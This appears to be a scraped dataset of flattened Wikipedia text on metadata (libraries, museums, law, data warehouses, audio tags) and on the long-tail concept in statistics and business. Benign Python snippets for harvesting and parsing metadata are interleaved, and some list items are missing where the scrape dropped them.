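# Harvest Dublin Core metadata over OAI-PMH (placeholder endpoint).
import requests
import xml.etree.ElementTree as ET

OAI_ENDPOINT = "https://example.org/oai"   # placeholder endpoint (assumption)
params = {"verb": "ListRecords", "metadataPrefix": "oai_dc"}

resp = requests.get(OAI_ENDPOINT, params=params, timeout=30)
root = ET.fromstring(resp.content)

ns = {"dc": "http://purl.org/dc/elements/1.1/"}
for title in root.findall(".//dc:title", ns):
    print(title.text)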
Leading libraries in the world give hints on their metadata standards strategies. 56 57 The use and creation of metadata in library and information science also include scientific publications: Metadata for scientific publications is often created by journal publishers and citation databases such as PubMed and Web of Science. The data contained within manuscripts or accompanying them as supplementary material is less often subject to metadata creation, 58 59 though they may be submitted to e.g. biomedical databases after publication. The original authors and database curators then become responsible for metadata creation, with the assistance of automated processes. Comprehensive metadata for all experimental data is the foundation of the FAIR Guiding Principles, or the standards for ensuring research data are findable, accessible, interoperable, and reusable. 60 Such metadata can then be utilized, complemented, and made accessible in useful ways. OpenAlex is a free online index of over 200 million scientific documents that integrates and provides metadata such as sources, citations, author information, scientific fields, and research topics. Its API and open source website can be used for metascience, scientometrics, and novel tools that query this semantic web of papers. 61 62 63 Another project under development, Scholia, uses the metadata of scientific publications for various visualizations and aggregation features such as providing a simple user interface summarizing literature about a specific feature of the SARS-CoV 2 virus using Wikidata's "main subject" property. 64 In research labor, transparent metadata about authors' contributions to works have been proposed e.g. the role played in the production of the paper, the level of contribution and the responsibilities. 65 66 Moreover, various metadata about scientific outputs can be created or complemented for instance, scite.ai attempts to track and link citations of papers as 'Supporting', 'Mentioning' or 'Contrasting' the study. 67 Other examples include developments of alternative metrics 68 which, beyond providing help for assessment and findability, also aggregate many of the public discussions about a scientific paper on social media such as Reddit, citations on Wikipedia, and reports about the study in the news media 69 and a call for showing whether or not the original findings are confirmed or could get reproduced. 70 71 Metadata in a museum context is the information that trained cultural documentation specialists, such as archivists, librarians, museum registrars and curators, create to index, structure, describe, identify, or otherwise specify works of art, architecture, cultural objects and their images. 72 73 74 Descriptive metadata is most commonly used in museum contexts for object identification and resource recovery purposes. 73 Metadata is developed and applied within collecting institutions and museums in order to: Many museums and cultural heritage centers recognize that given the diversity of artworks and cultural objects, no single model or standard suffices to describe and catalog cultural works. 72 73 74 For example, a sculpted Indigenous artifact could be classified as an artwork, an archaeological artifact, or an Indigenous heritage item. 
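Publication metadata of the kind OpenAlex exposes can be fetched over its public API. A hedged sketch follows; the search term is arbitrary, and only commonly documented response fields (display_name, publication_year, cited_by_count) are used.

# Query the OpenAlex works endpoint for publication metadata.
import requests

resp = requests.get("https://api.openalex.org/works",
                    params={"search": "web scraping", "per-page": 5},
                    timeout=30)
for work in resp.json().get("results", []):
    print(work.get("publication_year"), work.get("display_name"),
          "- citations:", work.get("cited_by_count"))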
The early stages of standardization in archiving, description and cataloging within the museum community began in the late 1990s with the development of standards such as Categories for the Description of Works of Art (CDWA), Spectrum, CIDOC Conceptual Reference Model (CRM), Cataloging Cultural Objects (CCO) and the CDWA Lite XML schema. 73 These standards use HTML and XML markup languages for machine processing, publication and implementation. 73 The Anglo-American Cataloguing Rules (AACR), originally developed for characterizing books, have also been applied to cultural objects, works of art and architecture. 74 Standards, such as the CCO, are integrated within a Museum's Collections Management System (CMS), a database through which museums are able to manage their collections, acquisitions, loans and conservation. 74 Scholars and professionals in the field note that the "quickly evolving landscape of standards and technologies" creates challenges for cultural documentarians, specifically non-technically trained professionals. 75 page needed Most collecting institutions and museums use a relational database to categorize cultural works and their images. 74 Relational databases and metadata work to document and describe the complex relationships amongst cultural objects and multi-faceted works of art, as well as between objects and places, people, and artistic movements. 73 74 Relational database structures are also beneficial within collecting institutions and museums because they allow for archivists to make a clear distinction between cultural objects and their images; an unclear distinction could lead to confusing and inaccurate searches. 74 An object's materiality, function, and purpose, as well as the size (e.g., measurements, such as height, width, weight), storage requirements (e.g., climate-controlled environment), and focus of the museum and collection, influence the descriptive depth of the data attributed to the object by cultural documentarians. 74 The established institutional cataloging practices, goals, and expertise of cultural documentarians and database structure also influence the information ascribed to cultural objects and the ways in which cultural objects are categorized. 72 74 Additionally, museums often employ standardized commercial collection management software that prescribes and limits the ways in which archivists can describe artworks and cultural objects. 75 As well, collecting institutions and museums use Controlled Vocabularies to describe cultural objects and artworks in their collections. 73 74 Getty Vocabularies and the Library of Congress Controlled Vocabularies are reputable within the museum community and are recommended by CCO standards. 74 Museums are encouraged to use controlled vocabularies that are contextual and relevant to their collections and enhance the functionality of their digital information systems. 73 74 Controlled Vocabularies are beneficial within databases because they provide a high level of consistency, improving resource retrieval. 73 74 Metadata structures, including controlled vocabularies, reflect the ontologies of the systems from which they were created. Often the processes through which cultural objects are described and categorized through metadata in museums do not reflect the perspectives of the maker communities. 72 76 Metadata has been instrumental in the creation of digital information systems and archives within museums and has made it easier for museums to publish digital content online. 
This has enabled audiences who might not have had access to cultural objects due to geographic or economic barriers to have access to them. 73 In the 2000s, as more museums have adopted archival standards and created intricate databases, discussions about Linked Data between museum databases have come up in the museum, archival, and library science communities. 75 Collection Management Systems (CMS) and Digital Asset Management tools can be local or shared systems. 74 Digital Humanities scholars note many benefits of interoperability between museum databases and collections, while also acknowledging the difficulties of achieving such interoperability. 75 Problems involving metadata in litigation in the United States are becoming widespread. when? Courts have looked at various questions involving metadata, including the discoverability of metadata by parties. The Federal Rules of Civil Procedure have specific rules for discovery of electronically stored information, and subsequent case law applying those rules has elucidated on the litigant's duty to produce metadata when litigating in federal court. 77 In October 2009, the Arizona Supreme Court has ruled that metadata records are public record. 78 Document metadata have proven particularly important in legal environments in which litigation has requested metadata, that can include sensitive information detrimental to a certain party in court. Using metadata removal tools to "clean" or redact documents can mitigate the risks of unwittingly sending sensitive data. This process partially (see data remanence) protects law firms from potentially damaging leaking of sensitive data through electronic discovery. Opinion polls have shown that 45% of Americans are "not at all confident" in the ability of social media sites to ensure their personal data is secure and 40% say that social media sites should not be able to store any information on individuals. 76% of Americans say that they are not confident that the information advertising agencies collect on them is secure and 50% say that online advertising agencies should not be allowed to record any of their information at all. 79 In Australia, the need to strengthen national security has resulted in the introduction of a new metadata storage law. 80 This new law means that both security and policing agencies will be allowed to access up to 2 years of an individual's metadata, with the aim of making it easier to stop any terrorist attacks and serious crimes from happening. Legislative metadata has been the subject of some discussion in law.gov forums such as workshops held by the Legal Information Institute at the Cornell Law School on 22 and 23 March 2010. The documentation for these forums is titled, "Suggested metadata practices for legislation and regulations". 81 A handful of key points have been outlined by these discussions, section headings of which are listed as follows: Australian medical research pioneered the definition of metadata for applications in health care. That approach offers the first recognized attempt to adhere to international standards in medical sciences instead of defining a proprietary standard under the World Health Organization (WHO) umbrella. The medical community yet did not approve of the need to follow metadata standards despite research that supported these standards. 
82 Research studies in the fields of biomedicine and molecular biology frequently yield large quantities of data, including results of genome or meta-genome sequencing, proteomics data, and even notes or plans created during the course of research itself. 83 Each data type involves its own variety of metadata and the processes necessary to produce these metadata. General metadata standards, such as ISA-Tab, 84 allow researchers to create and exchange experimental metadata in consistent formats. Specific experimental approaches frequently have their own metadata standards and systems: metadata standards for mass spectrometry include mzML 85 and SPLASH, 86 while XML-based standards such as PDBML 87 and SRA XML 88 serve as standards for macromolecular structure and sequencing data, respectively. The products of biomedical research are generally realized as peer-reviewed manuscripts and these publications are yet another source of data (see Science). A data warehouse (DW) is a repository of an organization's electronically stored data. Data warehouses are designed to manage and store the data. Data warehouses differ from business intelligence (BI) systems because BI systems are designed to use data to create reports and analyze the information, to provide strategic guidance to management. 89 Metadata is an important tool in how data is stored in data warehouses. The purpose of a data warehouse is to house standardized, structured, consistent, integrated, correct, "cleaned" and timely data, extracted from various operational systems in an organization. The extracted data are integrated in the data warehouse environment to provide an enterprise-wide perspective. Data are structured in a way to serve the reporting and analytic requirements. The design of structural metadata commonality using a data modeling method such as entity-relationship model diagramming is important in any data warehouse development effort. They detail metadata on each piece of data in the data warehouse. An essential component of a data warehouse business intelligence system is the metadata and tools to manage and retrieve the metadata. Ralph Kimball 90 describes metadata as the DNA of the data warehouse as metadata defines the elements of the data warehouse and how they work together. Kimball et al. 91 refers to 3 main categories of metadata: Technical metadata, business metadata and process metadata. Technical metadata is primarily definitional, while business metadata and process metadata is primarily descriptive. The categories sometimes overlap. The HTML format used to define web pages allows for the inclusion of a variety of types of metadata, from basic descriptive text, dates and keywords to further advanced metadata schemes such as the Dublin Core, e-GMS, and AGLS 92 standards. Pages and files can also be geotagged with coordinates, categorized or tagged, including collaboratively such as with folksonomies. When media has identifiers set or when such can be generated, information such as file tags and descriptions can be pulled or scraped from the Internet for example about movies. 93 Various online databases are aggregated and provide metadata for various data. The collaboratively built Wikidata has identifiers not just for media but also abstract concepts, various objects, and other entities, that can be looked up by humans and machines to retrieve useful information and to link knowledge in other knowledge bases and databases. 64 Metadata may be included in the page's header or in a separate file. 
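Extracting the page-header metadata just described is exactly what BeautifulSoup (already imported in this notebook) is good at; the sample markup below is invented.

# Pull metadata out of an HTML page header with BeautifulSoup.
from bs4 import BeautifulSoup

html_doc = """
<html><head>
  <title>Example article</title>
  <meta name="description" content="A short summary of the page.">
  <meta name="keywords" content="metadata, web scraping, example">
  <meta name="DC.creator" content="A. Author">
</head><body>...</body></html>
"""

soup = BeautifulSoup(html_doc, "html.parser")
page_meta = {tag.get("name"): tag.get("content")
             for tag in soup.find_all("meta") if tag.get("name")}
print(soup.title.string)
print(page_meta)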
Microformats allow metadata to be added to on-page data in a way that regular web users do not see, but computers, web crawlers and search engines can readily access. Many search engines are cautious about using metadata in their ranking algorithms because of exploitation of metadata and the practice of search engine optimization, SEO, to improve rankings. See the Meta element article for further discussion. This cautious attitude may be justified as people, according to Doctorow, 94 are not executing care and diligence when creating their own metadata and that metadata is part of a competitive environment where the metadata is used to promote the metadata creators own purposes. Studies show that search engines respond to web pages with metadata implementations, 95 and Google has an announcement on its site showing the meta tags that its search engine understands. 96 Enterprise search startup Swiftype recognizes metadata as a relevance signal that webmasters can implement for their website-specific search engine, even releasing their own extension, known as Meta Tags 2. 97 In the broadcast industry, metadata is linked to audio and video broadcast media to: This metadata can be linked to the video media thanks to the video servers. Most major broadcast sporting events like FIFA World Cup or the Olympic Games use this metadata to distribute their video content to TV stations through keywords. It is often the host broadcaster 98 who is in charge of organizing metadata through its International Broadcast Centre and its video servers. This metadata is recorded with the images and entered by metadata operators (loggers) who associate in live metadata available in metadata grids through software (such as Multicam(LSM) or IPDirector used during the FIFA World Cup or Olympic Games). 99 100 Metadata that describes geographic objects in electronic storage or format (such as datasets, maps, features, or documents with a geospatial component) has a history dating back to at least 1994. This class of metadata is described more fully on the geospatial metadata article. Ecological and environmental metadata is intended to document the "who, what, when, where, why, and how" of data collection for a particular study. This typically means which organization or institution collected the data, what type of data, which date(s) the data was collected, the rationale for the data collection, and the methodology used for the data collection. Metadata should be generated in a format commonly used by the most relevant science community, such as Darwin Core, Ecological Metadata Language, 101 or Dublin Core. Metadata editing tools exist to facilitate metadata generation (e.g. Metavist, 102 Mercury, Morpho 103 ). Metadata should describe the provenance of the data (where they originated, as well as any transformations the data underwent) and how to give credit for (cite) the data products. When first released in 1982, Compact Discs only contained a Table Of Contents (TOC) with the number of tracks on the disc and their length in samples. 104 105 Fourteen years later in 1996, a revision of the CD Red Book standard added CD-Text to carry additional metadata. 106 But CD-Text was not widely adopted. Shortly thereafter, it became common for personal computers to retrieve metadata from external sources (e.g. CDDB, Gracenote) based on the TOC. Digital audio formats such as digital audio files superseded music formats such as cassette tapes and CDs in the 2000s. 
Digital audio files could be labeled with more information than could be contained in just the file name. That descriptive information is called the audio tag or audio metadata in general. Computer programs specializing in adding or modifying this information are called tag editors. Metadata can be used to name, describe, catalog, and indicate ownership or copyright for a digital audio file, and its presence makes it much easier to locate a specific audio file within a group, typically through use of a search engine that accesses the metadata. As different digital audio formats were developed, attempts were made to standardize a specific location within the digital files where this information could be stored. As a result, almost all digital audio formats, including mp3, broadcast wav, and AIFF files, have similar standardized locations that can be populated with metadata. The metadata for compressed and uncompressed digital music is often encoded in the ID3 tag. Common editors such as TagLib support MP3, Ogg Vorbis, FLAC, MPC, Speex, WavPack TrueAudio, WAV, AIFF, MP4, and ASF file formats. With the availability of cloud applications, which include those to add metadata to content, metadata is increasingly available over the Internet. Metadata can be stored either internally, 107 in the same file or structure as the data (this is also called embedded metadata), or externally, in a separate file or field from the described data. A data repository typically stores the metadata detached from the data but can be designed to support embedded metadata approaches. Each option has advantages and disadvantages: Metadata can be stored in either human-readable or binary form. Storing metadata in a human-readable format such as XML can be useful because users can understand and edit it without specialized tools. 108 However, text-based formats are rarely optimized for storage capacity, communication time, or processing speed. A binary metadata format enables efficiency in all these respects, but requires special software to convert the binary information into human-readable content. Each relational database system has its own mechanisms for storing metadata. Examples of relational-database metadata include: In database terminology, this set of metadata is referred to as the catalog. The SQL standard specifies a uniform means to access the catalog, called the information schema, but not all databases implement it, even if they implement other aspects of the SQL standard. For an example of database-specific metadata access methods, see Oracle metadata. Programmatic access to metadata is possible using APIs such as JDBC, or SchemaCrawler. 109 One of the first satirical examinations of the concept of Metadata as we understand it today is American science fiction author Hal Draper's short story, "MS Fnd in a Lbry" (1961). Here, the knowledge of all Mankind is condensed into an object the size of a desk drawer, however, the magnitude of the metadata (e.g. catalog of catalogs of... , as well as indexes and histories) eventually leads to dire yet humorous consequences for the human race. The story prefigures the modern consequences of allowing metadata to become more important than the real data it is concerned with, and the risks inherent in that eventuality as a cautionary tale. |
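A hedged sketch of reading the audio tags (e.g. ID3) described above, assuming the mutagen package (pip install mutagen) and a made-up file name; the keys shown are the common "easy" tag names, not an exhaustive list.

# Read common audio tag metadata with mutagen.
from mutagen import File

def read_audio_tags(path):
    audio = File(path, easy=True)            # easy=True exposes common tag names
    if audio is None or audio.tags is None:
        return {}
    info = {"length_seconds": round(audio.info.length, 1)}
    for key in ("title", "artist", "album"):
        values = audio.tags.get(key)
        if values:                            # tag values come back as lists
            info[key] = values[0]
    return info

# print(read_audio_tags("song.mp3"))          # assumed file name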
570 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:MyTalk | This user is currently blocked. The latest block log entry is provided below for reference: People on Wikipedia can use this talk page to post a public message about edits made from the IP address you are currently using. Many IP addresses change periodically, and are often shared by several people. You may create an account or log in to avoid future confusion with other logged out users. Creating an account also hides your IP address. |
571 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Long_Tail | In statistics and business, a long tail of some distributions of numbers is the portion of the distribution having many occurrences far from the "head" or central part of the distribution. The distribution could involve popularities, random numbers of occurrences of events with various probabilities, etc. 1 The term is often used loosely, with no definition or an arbitrary definition, but precise definitions are possible. In statistics, the term long-tailed distribution has a narrow technical meaning, and is a subtype of heavy-tailed distribution. 2 3 4 Intuitively, a distribution is (right) long-tailed if, for any fixed amount, when a quantity exceeds a high level, it almost certainly exceeds it by at least that amount: large quantities are probably even larger. a Note that there is no sense of the "long tail" of a distribution, but only the property of a distribution being long-tailed. In business, the term long tail is applied to rank-size distributions or rank-frequency distributions (primarily of popularity), which often form power laws and are thus long-tailed distributions in the statistical sense. This is used to describe the retailing strategy of selling many unique items with relatively small quantities sold of each (the "long tail")—usually in addition to selling fewer popular items in large quantities (the "head"). Sometimes an intermediate category is also included, variously called the body, belly, torso, or middle. The specific cutoff of what part of a distribution is the "long tail" is often arbitrary, but in some cases may be specified objectively; see segmentation of rank-size distributions. The long tail concept has found some ground for application, research, and experimentation. It is a term used in online business, mass media, micro-finance (Grameen Bank, for example), user-driven innovation (Eric von Hippel), knowledge management, and social network mechanisms (e.g. crowdsourcing, crowdcasting, peer-to-peer), economic models, marketing (viral marketing), and IT Security threat hunting within a SOC (Information security operations center). Frequency distributions with long tails have been studied by statisticians since at least 1946. 5 The term has also been used in the finance 6 and insurance business 7 for many years. The work of Beno t Mandelbrot in the 1950s and later has led to him being referred to as "the father of long tails". 8 The long tail was popularized by Chris Anderson in an October 2004 Wired magazine article, in which he mentioned Amazon.com, Apple and Yahoo as examples of businesses applying this strategy. 7 9 Anderson elaborated the concept in his book The Long Tail: Why the Future of Business Is Selling Less of More. The distribution and inventory costs of businesses successfully applying a long tail strategy allow them to realize significant profit out of selling small volumes of hard-to-find items to many customers instead of only selling large volumes of a reduced number of popular items. The total sales of this large number of "non-hit items" is called "the long tail". Given enough choice, a large population of customers, and negligible stocking and distribution costs, the selection and buying pattern of the population results in the demand across products having a power law distribution or Pareto distribution. It is important to understand why some distributions are normal vs. long tail (power) distributions. 
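The intuition above ("large quantities are probably even larger") has a standard formalization in the statistical literature; in LaTeX notation, a distribution is (right) long-tailed when, for every fixed t > 0,

\lim_{x \to \infty} \Pr[X > x + t \mid X > x] = 1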
Chris Anderson argues that while quantities such as human height or IQ follow a normal distribution, in scale-free networks with preferential attachments, power law distributions are created, i.e. because some nodes are more connected than others (like Malcolm Gladwell’s “mavens” in The Tipping Point). 10 11 The long tail is the name for a long-known feature of some statistical distributions (such as Zipf, power laws, Pareto distributions and general L vy distributions). In "long-tailed" distributions a high-frequency or high-amplitude population is followed by a low-frequency or low-amplitude population which gradually "tails off" asymptotically. The events at the far end of the tail have a very low probability of occurrence. As a rule of thumb, for such population distributions the majority of occurrences (more than half, and where the Pareto principle applies, 80%) are accounted for by the first 20% of items in the distribution. Power law distributions or functions characterize an important number of behaviors from nature and human endeavor. This fact has given rise to a keen scientific and social interest in such distributions, and the relationships that create them. The observation of such a distribution often points to specific kinds of mechanisms, and can often indicate a deep connection with other, seemingly unrelated systems. Examples of behaviors that exhibit long-tailed distribution are the occurrence of certain words in a given language, the income distribution of a business or the intensity of earthquakes (see: Gutenberg Richter law). Chris Anderson's and Clay Shirky's articles highlight special cases in which we are able to modify the underlying relationships and evaluate the impact on the frequency of events. In those cases the infrequent, low-amplitude (or low-revenue) events the long tail, represented here by the portion of the curve to the right of the 20th percentile can become the largest area under the line. This suggests that a variation of one mechanism (internet access) or relationship (the cost of storage) can significantly shift the frequency of occurrence of certain events in the distribution. The shift has a crucial effect in probability and in the customer demographics of businesses like mass media and online sellers. However, the long tails characterizing distributions such as the Gutenberg Richter law or the words-occurrence Zipf's law, and those highlighted by Anderson and Shirky are of very different, if not opposite, nature: Anderson and Shirky refer to frequency-rank relations, whereas the Gutenberg Richter law and the Zipf's law are probability distributions. Therefore, in these latter cases "tails" correspond to large-intensity events such as large earthquakes and most popular words, which dominate the distributions. By contrast, the long tails in the frequency-rank plots highlighted by Anderson and Shirky would rather correspond to short tails in the associated probability distributions, and therefore illustrate an opposite phenomenon compared to the Gutenberg Richter and the Zipf's laws. Use of the phrase the long tail in business as "the notion of looking at the tail itself as a new market" of consumers was first coined by Chris Anderson. 12 The concept drew in part from a February 2003 essay by Clay Shirky, "Power Laws, Weblogs and Inequality", 13 which noted that a relative handful of weblogs have many links going into them but "the long tail" of millions of weblogs may have only a handful of links going into them. 
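The head/tail split described here (e.g. the 80/20 rule of thumb) can be simulated with a power-law sample. The sketch below assumes numpy is available (it ships with pandas); the shape parameter is chosen arbitrarily, so the resulting split is only roughly in the 80/20 neighbourhood.

# Simulate a power-law ("Pareto-like") sales distribution and measure the head's share.
import numpy as np

rng = np.random.default_rng(0)
sales = np.sort(rng.pareto(a=1.16, size=100_000))[::-1]   # descending "sales"

top_20_percent = sales[: len(sales) // 5]
print("Share of total from the top 20% of items:",
      round(top_20_percent.sum() / sales.sum(), 3))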
Anderson described the effects of the long tail on current and future business models beginning with a series of speeches in early 2004 and with the publication of a Wired magazine article in October 2004. Anderson later extended it into the book The Long Tail: Why the Future of Business is Selling Less of More (2006). Anderson argues that products in low demand or that have a low sales volume can collectively make up a market share that rivals or exceeds the relatively few current bestsellers and blockbusters, if the store or distribution channel is large enough. Anderson cites earlier research by Erik Brynjolfsson, Yu (Jeffrey) Hu, and Michael D. Smith, that showed that a significant portion of Amazon.com's sales come from obscure books that are not available in brick-and-mortar stores. The long tail is a potential market and, as the examples illustrate, the distribution and sales channel opportunities created by the Internet often enable businesses to tap that market successfully. In his Wired article Anderson opens with an anecdote about creating a niche market for books on Amazon. He writes about a book titled Touching the Void about a near-death mountain climbing accident that took place in the Peruvian Andes. Anderson states the book got good reviews, but didn't have much commercial success. However, ten years later a book titled Into Thin Air by Jon Krakauer was published and Touching the Void began to sell again. Anderson realized that this was due to Amazon's recommendations. This created a niche market for those who enjoy books about mountain climbing even though it is not considered a popular genre supporting the long tail theory. An Amazon employee described the long tail as follows: "We sold more books today that didn't sell at all yesterday than we sold today of all the books that did sell yesterday. 14 Anderson has explained the term as a reference to the tail of a demand curve. 15 The term has since been rederived from an XY graph that is created when charting popularity to inventory. In the graph shown above, Amazon's book sales would be represented along the vertical axis, while the book or movie ranks are along the horizontal axis. The total volume of low popularity items exceeds the volume of high popularity items. In his Wired article, Chris Anderson cites earlier research by Erik Brynjolfsson, Yu (Jeffrey) Hu, and Michael D. Smith, who first used a log-linear curve on an XY graph to describe the relationship between Amazon.com sales and sales ranking. They found that a large proportion of Amazon.com's book sales come from obscure books that were not available in brick-and-mortar stores. They then quantified the potential value of the long tail to consumers. In an article published in 2003, these authors showed that, while most of the discussion about the value of the Internet to consumers has revolved around lower prices, consumer benefit (a.k.a. consumer surplus) from access to increased product variety in online book stores is ten times larger than their benefit from access to lower prices online. Thus, the primary value of the internet to consumers comes from releasing new sources of value by providing access to products in the long tail. 16 A study by Erik Brynjolfsson, Yu (Jeffrey) Hu, and Michael D. Smith 17 finds that the long tail has grown longer over time, with niche books accounting for a larger share of total sales. 
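The log-linear rank-sales relationship mentioned above amounts to fitting a straight line in log-log space; a hedged sketch on synthetic data follows (the rank-sales figures are invented).

# Regress log(sales) on log(rank) to estimate the power-law slope.
import numpy as np

ranks = np.arange(1, 1001)
sales = 5000 / ranks**0.8                      # invented rank-sales relationship
slope, intercept = np.polyfit(np.log(ranks), np.log(sales), 1)
print("Estimated slope:", round(slope, 3))     # close to -0.8 for this toy data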
Their analyses suggested that by 2008, niche books accounted for 36.7% of Amazon's sales while the consumer surplus generated by niche books has increased at least fivefold from 2000 to 2008. In addition, their new methodology finds that, while the widely used power laws are a good first approximation for the rank-sales relationship, the slope may not be constant for all book ranks, with the slope becoming progressively steeper for more obscure books. In support of their findings, Wenqi Zhou and Wenjing Duan not only find a longer tail but also a fatter tail by an in-depth analysis on consumer software downloading pattern in their paper "Online user reviews, product variety, and the long tail". 18 The demand for all products decreases, but the decrease for the hits is more pronounced, indicating the demand shifting from the hits to the niches over time. In addition, they also observe a superstar effect in the presence of the long tail. A small number of very popular products still dominates the demand. In a 2006 working paper titled "Goodbye Pareto Principle, Hello Long Tail", 19 Erik Brynjolfsson, Yu (Jeffrey) Hu, and Duncan Simester found that, by greatly lowering search costs, information technology in general and Internet markets in particular could substantially increase the collective share of hard-to-find products, thereby creating a longer tail in the distribution of sales. They used a theoretical model to show how a reduction in search costs will affect the concentration in product sales. By analyzing data collected from a multi-channel retailing company, they showed empirical evidence that the Internet channel exhibits a significantly less concentrated sales distribution, when compared with traditional channels. An 80 20 rule fits the distribution of product sales in the catalog channel quite well, but in the Internet channel, this rule needs to be modified to a 72 28 rule in order to fit the distribution of product sales in that channel. The difference in the sales distribution is highly significant, even after controlling for consumer differences. The key supply-side factor that determines whether a sales distribution has a long tail is the cost of inventory storage and distribution. Where inventory storage and distribution costs are insignificant, it becomes economically viable to sell relatively unpopular products; however, when storage and distribution costs are high, only the most popular products can be sold. For example, a traditional movie rental store has limited shelf space, which it pays for in the form of building overhead; to maximize its profits, it must stock only the most popular movies to ensure that no shelf space is wasted. Because online video rental provider (such as Amazon.com or Netflix) stocks movies in centralized warehouses, its storage costs are far lower and its distribution costs are the same for a popular or unpopular movie. It is therefore able to build a viable business stocking a far wider range of movies than a traditional movie rental store. Those economics of storage and distribution then enable the advantageous use of the long tail: for example, Netflix finds that in aggregate, "unpopular" movies are rented more than popular movies. An MIT Sloan Management Review article titled "From Niches to Riches: Anatomy of the Long Tail" 20 examined the long tail from both the supply side and the demand side and identifies several key drivers. 
On the supply side, the authors point out how e-tailers' expanded, centralized warehousing allows for more offerings, thus making it possible for them to cater to more varied tastes. 21 On the demand side, tools such as search engines, recommendation software, and sampling tools are allowing customers to find products outside their geographic area. The authors also look toward the future to discuss second-order, amplified effects of Long Tail, including the growth of markets serving smaller niches. Not all recommender systems are equal, however, when it comes to expanding the long tail. Some recommenders (i.e. certain collaborative filters) can exhibit a bias toward popular products, creating positive feedback, and actually reduce the long tail. A Wharton study details this phenomenon along with several ideas that may promote the long tail and greater diversity. 22 A 2010 study conducted by Wenqi Zhou and Wenjing Duan 18 further points out that the demand side factor (online user reviews) and the supply side factor (product variety) interplay to influence the long tail formation of user choices. Consumers' reliance on online user reviews to choose products is significantly influenced by the quantity of products available. Specifically, they find that the impacts of both positive and negative user reviews are weakened as product variety goes up. In addition, the increase in product variety reduces the impact of user reviews on popular products more than it does on niche products. The "crowds" of customers, users and small companies that inhabit the long-tail distribution can perform collaborative and assignment work. Some relevant forms of these new production models are: The demand-side factors that lead to the long tail can be amplified by the "networks of products" which are created by hyperlinked recommendations across products. An MIS Quarterly article by Gal Oestreicher-Singer and Arun Sundararajan shows that categories of books on Amazon.com which are more central and thus influenced more by their recommendation network have significantly more pronounced long-tail distributions. Their data across 200 subject areas shows that a doubling of this influence leads to a 50% increase in revenues from the least popular one-fifth of books. 24 The long-tail distribution applies at a given point in time, but over time the relative popularity of the sales of the individual products will change. 25 Although the distribution of sales may appear to be similar over time, the positions of the individual items within it will vary. For example, new items constantly enter most fashion markets. A recent fashion-based model 26 of consumer choice, which is capable of generating power law distributions of sales similar to those observed in practice, 27 takes into account turnover in the relative sales of a given set of items, as well as innovation, in the sense that entirely new items become offered for sale. There may be an optimal inventory size, given the balance between sales and the cost of keeping up with the turnover. An analysis based on this pure fashion model 28 indicates that, even for digital retailers, the optimal inventory may in many cases be less than the millions of items that they can potentially offer. In other words, by proceeding further and further into the long tail, sales may become so small that the marginal cost of tracking them in rank order, even at a digital scale, might be optimised well before a million titles, and certainly before infinite titles. 
This model can provide further predictions about markets with a long-tail distribution, such as the basis for a model for optimizing the number of each individual item ordered, given its current sales rank and the total number of different titles stocked. From a given country's viewpoint, diplomatic interactions with other countries likewise exhibit a long tail. 29 Strategic partners receive the largest amount of diplomatic attention, while a long tail of remote states obtains just an occasional signal of peace. The fact that even allegedly "irrelevant" countries obtain at least rare amicable interactions from virtually all other states has been argued to create a societal surplus of peace, a reservoir that can be mobilized when a state needs it. The long tail thus functionally resembles "weak ties" in interpersonal networks. Before a long tail works, only the most popular products are generally offered. When the costs of inventory storage and distribution fall, a wide range of products becomes available. This can, in turn, have the effect of reducing demand for the most popular products. For example, a small website that focuses on niche content can be threatened by a larger website (such as Yahoo) that offers a wide variety of Web content. The big website covers more variety while the small website has only a few niches to choose from. The competitive threat from these niche sites is reduced by the cost of establishing and maintaining them and the effort required for readers to track multiple small websites. These factors have been transformed by easy and cheap website software and the spread of RSS. Similarly, mass-market distributors like Blockbuster may be threatened by distributors like LoveFilm, which supply the titles that Blockbuster doesn't offer because they are not already very popular. Some of the most successful Internet businesses have used the long tail as part of their business strategy. Examples include eBay (auctions), Yahoo and Google (web search), Amazon (retail), and iTunes Store (music and podcasts), amongst the major companies, along with smaller Internet companies like Audible (audio books) and LoveFilm (video rental). These purely digital retailers also have almost no marginal cost, which benefits the online services, unlike physical retailers that face fixed limits on their products. The internet can still sell physical goods, but with an effectively unlimited selection and with reviews and recommendations. 30 The internet has opened up larger territories in which to sell and provide products, without being confined to "local markets" in the way that physical retailers like Target or even Walmart are. With digital and hybrid retailers there is no longer a geographic boundary on market demand. 31 The adoption of video games and massively multiplayer online games such as Second Life as tools for education and training is starting to show a long-tailed pattern. It costs significantly less to modify a game than to create unique training applications, such as those for training in business, commercial flight, and military missions. This has led some to envision a time in which game-based training devices or simulations will be available for thousands of different job descriptions. The banking business has used internet technology to reach an increasing number of customers. The most important shift in business model due to the long tail has come from the various forms of microfinance developed.
As opposed to e-tailers, microfinance is a distinctly low-technology business. Its aim is to offer very small credits to lower-middle-class, lower-class, and poor people who would otherwise be ignored by the traditional banking business. The banks that have followed this strategy of selling services to the low-frequency long tail of the sector have found that it can be an important niche, long ignored by consumer banks. 32 The recipients of small credits tend to be very good at repaying their loans, despite their non-existent credit histories. They are also willing to pay higher interest rates than the standard bank or credit card customer. It is also a business model that fills an important developmental role in an economy. 33 Grameen Bank in Bangladesh has successfully followed this business model. In Mexico, the banks Compartamos and Banco Azteca also service this customer demographic, with an emphasis on consumer credit. Kiva.org is an organization that provides microcredits to people worldwide by using intermediaries, called small microfinance organizations (S.M.O.s), to distribute crowdsourced donations made by Kiva.org lenders. According to the user-driven innovation model, companies can rely on users of their products and services to do a significant part of the innovation work. Users want products that are customized to their needs. They are willing to tell the manufacturer what they really want and how it should work. Companies can make use of a series of tools, such as interactive and internet-based technologies, to give their users a voice and to enable them to do innovation work that is useful to the company. Given the diminishing cost of communication and information sharing (by analogy to the low cost of storage and distribution, in the case of e-tailers), long-tailed user-driven innovation will gain importance for businesses. In following a long-tailed innovation strategy, the company is using the model to tap into a large group of users that are in the low-intensity area of the distribution. It is their collaboration and aggregated work that results in an innovation effort. Social innovation communities formed by groups of users can rapidly perform the trial-and-error process of innovation, share information, and test and diffuse the results. Eric von Hippel of MIT's Sloan School of Management defined the user-led innovation model in his book Democratizing Innovation. 34 Among his conclusions is the insight that as innovation becomes more user-centered, information needs to flow freely, in a more democratic way, creating a "rich intellectual commons" and "attacking a major structure of the social division of labor". In today's world, customers are eager to voice their opinions and shape the products and services they use. This presents a unique opportunity for companies to leverage interactive and internet-based technologies to give their users a voice and enable them to participate in the innovation process. By doing so, companies can gain valuable insights into their customers' 